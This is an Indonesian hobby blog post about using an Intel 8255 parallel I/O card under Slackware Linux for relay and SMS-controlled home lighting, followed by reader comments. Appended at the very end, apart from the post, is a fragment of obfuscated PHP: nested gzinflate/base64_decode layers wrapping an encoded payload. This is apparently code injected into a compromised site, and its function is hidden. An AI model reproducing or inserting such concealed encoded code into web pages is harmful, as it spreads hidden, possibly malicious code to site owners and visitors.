Delicious

Archives

Categories

Intel 8255 on Slackware 7.1

  ozzie / 29/08/2007


Mungkin Teknologinya udah Basi kali yak?? :-?? dibanding sekarang yang lebih ke USB :-? tapi sekedar Refreshing :> dan kebetulan masih ada yg jual di Glodok 8-}..
8255
FYI: http://dt-51.com/.

Past: Pada masa kejayaannya. PPI8255 cukup naik daun :D.. karena compatible dengan berbagai bahasa programming yang berjalan pada platform Windows 8-}. seperti Assembler, C, Pascal, Basic hingga Delphi..

Today: Berhubung Sekarang ngoprek nya pake Slackware 7.1 di kernel 2.4.18 yang arsitektur kernelnya Sangat berbeda ama win32 8-} maka dibutuhkan tenaga, waktu, pikiran, kopi, rokok ekstra ;)) lebih enak lagih kalo ada cewe ekstra 8->8-> ;)) dan sekian lama browsing akhirnya dapet module disa8255 buat linux\:d/. coba-coba hijrah ke FreeBSD ternyata lebih ribet 8-} pake /dev/pbio :-< ..

untuk sementara output dari DB-25 nya di gabungin ke project-board dulu, sekalian ngoprek di sisi program;)).. yang kebetulan ngopreknya pake bahasa C.:((:(( dari coba yang console [Command Line Interface], coba bikin shell sendiri berbasis TCL, ampe dicampur Dialog. beranjak ke X digabungin ama TCL/TK. dan sekarang pengennya Manageable ke arah Web-Based dengan campuran sedikit AJAX [-o< 8-> ;));))

Future: Keluar dari DB-25 kan jadi 3 port yang masing2 ada 8. kebetulan Port A & Port B sebagai Output. dan port C sebagai Input .. :-?:-? mo di gabungin ama modulenya Relay-Board.. tinggal output dari relay disambung ke rumah kabel di gudang. <:-p lalu setelah protocol HTTP-nya up, yang penting bisa POST ama GET tinggal setup SMS-Gateway dah. pake Kannel juga udah cukup. tinggal banyakin ajah sms-service nya itung2 port-forwarding ;));))
Pulang kampung lampu jalan belon nyala tinggal sms dah.. <:-p<:-p

nih om kalo mo coba;));)).. http://devel.ozzie.web.id
tapi kalo rada berat maklumin ajah :D:D.. spec-nya cuma Pentium I [133Mhz] Ram 16 MB =)) without VGA 8-}

http://blog.ozzie.web.id/?p=128


« »


5 Responses to “Intel 8255 on Slackware 7.1”

  1. Michael D Says:

    Jadi inget project PPI 8255 waktu kuliah dulu :P
    Cuman 8255 dihubungin ama mikrokontroler.

    Oprekan basis ncurse (??) oke juga ! Simple but tokcer Hehehe

  2. Fajri Says:

    Gilee om..keren bnget…
    siip dah keren bnget…
    sukses buat lo Om..
    gw binun Ji..kaga ngerti..
    mklum newbie abiss..

  3. Moh. jasri Says:

    Terima kasih tentang penjelasan PPI8255nya, kalau bisa kirimi aq pemjelasan lebih lanjut tentang PPI255. terima kasih.

  4. irul Says:

    It’s done om, pake parallel port tapi :D

  5. meyer Says:

    keren bgt tuh..ampe gw gag ngerti..hehe
    bang gman seh listing program bahasa C untuk interface 2 buah PPI 8255 dengan slot ISA..
    Cayo..


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>